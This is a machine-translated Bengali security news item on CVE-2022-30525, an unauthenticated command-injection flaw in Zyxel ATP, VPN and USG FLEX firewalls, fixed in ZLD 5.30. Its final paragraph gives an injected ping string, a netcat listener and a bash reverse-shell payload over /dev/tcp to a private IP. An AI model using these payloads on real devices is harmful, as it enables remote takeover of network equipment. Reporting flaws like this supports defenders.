Zyxel ফায়ারওয়ালে দুর্বলতা যা প্রমাণীকরণ ছাড়াই কোড কার্যকর করার অনুমতি দেয়

ATP, VPN এবং USG FLEX সিরিজের Zyxel ডিভাইসগুলিতে একটি জটিল দুর্বলতা (CVE-2022-30525) চিহ্নিত করা হয়েছে, যা এন্টারপ্রাইজগুলিতে ফায়ারওয়াল, আইডিএস এবং ভিপিএন পরিচালনা করার জন্য ডিজাইন করা হয়েছে, যা একটি বহিরাগত আক্রমণকারীকে কোড কার্যকর করতে দেয়। প্রমাণীকরণ ছাড়া ব্যবহারকারীর অধিকার ছাড়া ডিভাইস। আক্রমণ চালানোর জন্য, একজন আক্রমণকারীকে অবশ্যই HTTP/HTTPS প্রোটোকল ব্যবহার করে ডিভাইসে অনুরোধ পাঠাতে সক্ষম হতে হবে। Zyxel ZLD 5.30 ফার্মওয়্যার আপডেটে দুর্বলতা ঠিক করেছে। শোদান পরিষেবা অনুসারে, বর্তমানে বিশ্বব্যাপী নেটওয়ার্কে 16213টি সম্ভাব্য দুর্বল ডিভাইস রয়েছে যা HTTP/HTTPS এর মাধ্যমে অনুরোধগুলি গ্রহণ করে।

ওয়েব হ্যান্ডলার /ztp/cgi-bin/হ্যান্ডলারে বিশেষভাবে ডিজাইন করা কমান্ড পাঠানোর মাধ্যমে অপারেশন করা হয়, প্রমাণীকরণ ছাড়াই অ্যাক্সেসযোগ্য। lib_wan_settings.py লাইব্রেরিতে ব্যবহৃত os.system কল ব্যবহার করে সিস্টেমে কমান্ড নির্বাহ করার সময় এবং setWanPortSt অপারেশন প্রক্রিয়াকরণের সময় কার্যকর করার সময় অনুরোধের পরামিতিগুলির সঠিক পরিচ্ছন্নতার অভাবের কারণে সমস্যাটি ঘটে।

উদাহরণস্বরূপ, একজন আক্রমণকারী স্ট্রিং পাস করতে পারে “; পিং 192.168.1.210;" যা সিস্টেমে "ping 192.168.1.210" কমান্ড কার্যকর করার দিকে পরিচালিত করবে। কমান্ড শেল অ্যাক্সেস পেতে, আপনি আপনার সিস্টেমে “nc -lvnp 1270” চালাতে পারেন, এবং তারপরে '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'।

উত্স: opennet.ru